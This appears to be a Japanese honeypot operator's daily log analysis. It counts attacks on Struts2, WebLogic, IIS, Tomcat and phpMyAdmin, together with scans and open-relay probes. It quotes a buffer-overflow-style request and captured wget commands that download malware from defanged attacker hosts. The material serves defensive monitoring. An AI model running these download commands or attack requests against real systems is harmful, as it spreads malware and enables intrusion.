ハニーポットのログ分析(2018/10/12)
WOWhoneypotの2018/10/12(金) (運用129日目)の簡易分析です。
本日の総アクセス件数は 69件です。
主なアクセスは以下です。
・Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃:15件
・Weblogicの脆弱性(CVE-2017-10271)を突く攻撃:2件
・定期的にアクセスがある「Host:xx.utm999[.]com」の不正中継の調査(?)のアクセスです。
HEAD /static/upload/20180921/th_317a3298794099e0bab477e4f3d732a4.png HTTP/1.1
Host: jf.utm999[.]com
Cache-Control: no-cache
・(新規)どんな製品を狙ったものは特定はできませんでしたが、POST内容から判断するにBuffer over Flow系の攻撃でしょうか。
POST /fndex.html?id=1 HTTP/1.1
Content-Length: 256AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
以下が全アクセスログです。
件数 | 日付 | 種別 | リクエスト |
33 | 2018-10-12 | アクセス | GET / |
15 | 2018-10-12 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
3 | 2018-10-12 | phpMyAdminの調査 | GET /phpmyadmin |
2 | 2018-10-12 | Weblogicの脆弱性(CVE-2017-10271)を突く攻撃 | POST /wls-wsat/CoordinatorPortType |
2 | 2018-10-12 | 調査 | HEAD / |
2 | 2018-10-12 | クローリング | GET /robots.txt |
1 | 2018-10-12 | IISの脆弱性(CVE-2017-7269)を突く攻撃 | PROPFIND / |
1 | 2018-10-12 | NMAPによるスキャン | POST /sdk |
1 | 2018-10-12 | 不明 | POST /fndex.html?id=1 |
1 | 2018-10-12 | 不正中継の調査 | HEAD /static/upload/20180921/th_317a3298794099e0bab477e4f3d732a4.png |
1 | 2018-10-12 | Jenkinsの調査 | GET /systemInfo |
1 | 2018-10-12 | NMAPによるスキャン | GET /NmapUpperCheck1539309478 |
1 | 2018-10-12 | NMAPによるスキャン | GET /nmaplowercheck1539309478 |
1 | 2018-10-12 | NMAPによるスキャン | GET /Nmap/folder/check1539309478 |
1 | 2018-10-12 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
1 | 2018-10-12 | 不正中継の調査 | GET hxxp://112.35.88.28:10083/index.php |
1 | 2018-10-12 | 不正中継の調査 | GET hxxp://110.249.212.46/testget?q=23333&port=80 |
1 | 2018-10-12 | アクセス | GET /favicon.ico |
本日のドメイン名でのアクセスは以下です。
5 GET /
2 GET /robots.txt
本日のハンティングログは以下です。wgetはStruts2の脆弱性を突く攻撃のものです。DL.phpはWeblogicの脆弱性を突くものです。どちらもずっと同じようなURLを使用しており、それぞれの攻撃社グループが継続的に狙っているのだと思われます。
5 2018-10-12 wget -c hxxp://wap.tfddos[.]net:57843/linux
3 2018-10-12 wget -c hxxp://43.226.146.23[:]55335/hhkkkyyy
1 2018-10-12 hxxp://120.25.148[.]202/images/test/DL.php
1 2018-10-12 hxxp://101.00.45[.]78/images/test/DL.php
以上です。